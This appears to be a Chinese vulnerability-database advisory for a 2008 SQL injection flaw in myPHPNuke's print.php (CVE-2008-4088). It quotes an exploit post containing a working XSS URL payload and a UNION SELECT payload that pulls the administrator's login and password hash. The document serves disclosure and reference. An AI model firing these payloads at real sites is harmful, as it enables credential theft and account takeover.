myPHPNuke 'print.php' SQL注入漏洞

漏洞ID	1115993	漏洞类型	SQL注入
发布时间	2008-08-31	更新时间	2009-01-29
CVE编号	CVE-2008-4088	CNNVD-ID	CNNVD-200809-201
漏洞平台	PHP	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/6338
https://cxsecurity.com/issue/WLB-2008090125
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200809-201

|漏洞详情

myPHPNuke是一款开放源代码的站点内容构建系统。myPHPNuke(MPN)1.8.8_8rc2之前版本的print.phpzhogn存在SQL注入漏洞。远程攻击者通过sid参数以执行任意SQL命令。

|漏洞EXP

############################################################

Cross-Site Scripting and SQL Injection vulnerabilities in myPHPNuke

By MustLive (http://websecurity.com.ua)

Detailed information: http://websecurity.com.ua/2391/

Description: There are Cross-Site Scripting and SQL Injection vulnerabilities in print.php in myPHPNuke.

XSS:

http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1

With this query you will receive login and password (hash) of administrator.

Vulnerable versions are myPHPNuke < 1.8.8_8rc2. In last version the additional filters were added, so it is not vulnerable to these XSS and SQL Injection attacks. But version 1.8.8_8rc2 is still vulnerable to SQL Injection and so limited SQL Injection attack is possible (without using spaces and brackets).

############################################################ 

# milw0rm.com [2008-08-31]

|参考资料

来源:XF
名称:myphpnuke-print-sql-injection(45084)
链接:http://xforce.iss.net/xforce/xfdb/45084
来源:BID
名称:31114
链接:http://www.securityfocus.com/bid/31114
来源:BID
名称:31112
链接:http://www.securityfocus.com/bid/31112
来源:BID
名称:30942
链接:http://www.securityfocus.com/bid/30942
来源:MILW0RM
名称:6338
链接:http://www.milw0rm.com/exploits/6338
来源:SREASON
名称:4255
链接:http://securityreason.com/securityalert/4255

myPHPNuke 'print.php' SQL注入漏洞

|漏洞来源

|漏洞详情

|漏洞EXP

|参考资料

检索漏洞

相关漏洞